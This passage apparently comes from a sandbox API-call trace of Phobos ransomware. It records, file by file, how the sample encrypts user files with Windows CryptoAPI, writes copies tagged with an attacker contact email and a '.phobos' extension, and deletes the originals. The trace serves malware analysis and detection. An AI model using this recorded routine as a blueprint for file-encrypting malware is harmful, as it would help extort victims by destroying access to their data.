returned 1 [0199.590] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0199.590] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.590] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.590] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.590] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.590] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.590] CloseHandle (hObject=0x15c) returned 1 [0199.590] CloseHandle (hObject=0x130) returned 1 [0199.590] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms")) returned 1 [0199.592] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.592] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.592] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3598) returned 1 [0199.592] CloseHandle (hObject=0x130) returned 1 [0199.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms")) returned 0x2020 [0199.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.593] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.593] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.594] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.594] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.594] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xe0e, lpOverlapped=0x0) returned 1 [0199.597] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10, dwBufLen=0xe10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xe10) returned 1 [0199.597] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe10, lpOverlapped=0x0) returned 1 [0199.598] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0199.598] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.598] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0199.598] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0199.598] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0199.598] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.598] CloseHandle (hObject=0x130) returned 1 [0199.598] CloseHandle (hObject=0x15c) returned 1 [0199.598] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Videos.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\videos.library-ms")) returned 1 [0199.599] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-ErXgd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\-erxgd.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.813] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=988) returned 1 [0199.813] CloseHandle (hObject=0x140) returned 1 [0199.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-ErXgd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\-erxgd.lnk")) returned 0x20 [0199.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-ErXgd.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\-erxgd.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-ErXgd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\-erxgd.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.814] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.814] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-ErXgd.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\-erxgd.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.815] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32aa8) returned 1 [0199.815] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.815] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3dc, lpOverlapped=0x0) returned 1 [0199.817] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e0, dwBufLen=0x3e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e0) returned 1 [0199.817] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3e0, lpOverlapped=0x0) returned 1 [0199.818] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32b68) returned 1 [0199.818] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.818] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.818] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.818] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.818] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.818] CloseHandle (hObject=0x140) returned 1 [0199.818] CloseHandle (hObject=0x15c) returned 1 [0199.818] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\-ErXgd.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\-erxgd.lnk")) returned 1 [0199.819] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4i9F_Il1.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4i9f_il1.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.823] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6567) returned 1 [0199.823] CloseHandle (hObject=0x170) returned 1 [0199.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4i9F_Il1.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4i9f_il1.lnk")) returned 0x20 [0199.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4i9F_Il1.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4i9f_il1.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4i9F_Il1.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4i9f_il1.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.823] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.823] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4i9F_Il1.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4i9f_il1.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11c [0199.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32828) returned 1 [0199.824] CryptSetKeyParam (hKey=0xa32828, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.824] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x19a7, lpOverlapped=0x0) returned 1 [0199.826] CryptEncrypt (in: hKey=0xa32828, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x19b0, dwBufLen=0x19b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x19b0) returned 1 [0199.826] WriteFile (in: hFile=0x11c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x19b0, lpOverlapped=0x0) returned 1 [0199.827] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0199.827] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.827] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.827] CryptDestroyKey (hKey=0xa32868) returned 1 [0199.827] WriteFile (in: hFile=0x11c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.827] CryptDestroyKey (hKey=0xa32828) returned 1 [0199.827] CloseHandle (hObject=0x170) returned 1 [0199.827] CloseHandle (hObject=0x11c) returned 1 [0199.827] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\4i9F_Il1.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\4i9f_il1.lnk")) returned 1 [0199.828] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5_HAXPP g-i-7iPCiO2e.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5_haxpp g-i-7ipcio2e.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.832] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1060) returned 1 [0199.832] CloseHandle (hObject=0x170) returned 1 [0199.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5_HAXPP g-i-7iPCiO2e.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5_haxpp g-i-7ipcio2e.flv.lnk")) returned 0x20 [0199.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5_HAXPP g-i-7iPCiO2e.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5_haxpp g-i-7ipcio2e.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5_HAXPP g-i-7iPCiO2e.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5_haxpp g-i-7ipcio2e.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.833] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.833] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.833] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5_HAXPP g-i-7iPCiO2e.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5_haxpp g-i-7ipcio2e.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0199.833] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0199.833] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.834] ReadFile (in: hFile=0x170, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x424, lpOverlapped=0x0) returned 1 [0199.835] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430, dwBufLen=0x430 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x430) returned 1 [0199.835] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x430, lpOverlapped=0x0) returned 1 [0199.836] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329a8) returned 1 [0199.836] CryptSetKeyParam (hKey=0xa329a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.836] CryptEncrypt (in: hKey=0xa329a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0199.836] CryptDestroyKey (hKey=0xa329a8) returned 1 [0199.836] WriteFile (in: hFile=0x120, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0199.837] CryptDestroyKey (hKey=0xa32868) returned 1 [0199.837] CloseHandle (hObject=0x170) returned 1 [0199.837] CloseHandle (hObject=0x120) returned 1 [0199.837] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5_HAXPP g-i-7iPCiO2e.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5_haxpp g-i-7ipcio2e.flv.lnk")) returned 1 [0199.838] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6c2UZa.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6c2uza.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0199.839] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2476) returned 1 [0199.839] CloseHandle (hObject=0x120) returned 1 [0199.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6c2UZa.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6c2uza.mkv.lnk")) returned 0x20 [0199.839] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6c2UZa.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6c2uza.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.839] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6c2UZa.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6c2uza.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0199.839] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.840] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6c2UZa.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6c2uza.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0199.840] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0199.841] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.841] ReadFile (in: hFile=0x120, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9ac, lpOverlapped=0x0) returned 1 [0199.842] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9b0, dwBufLen=0x9b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9b0) returned 1 [0199.842] WriteFile (in: hFile=0x170, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x9b0, lpOverlapped=0x0) returned 1 [0199.843] CryptImportKey (in: hProv=0xa24cf8, 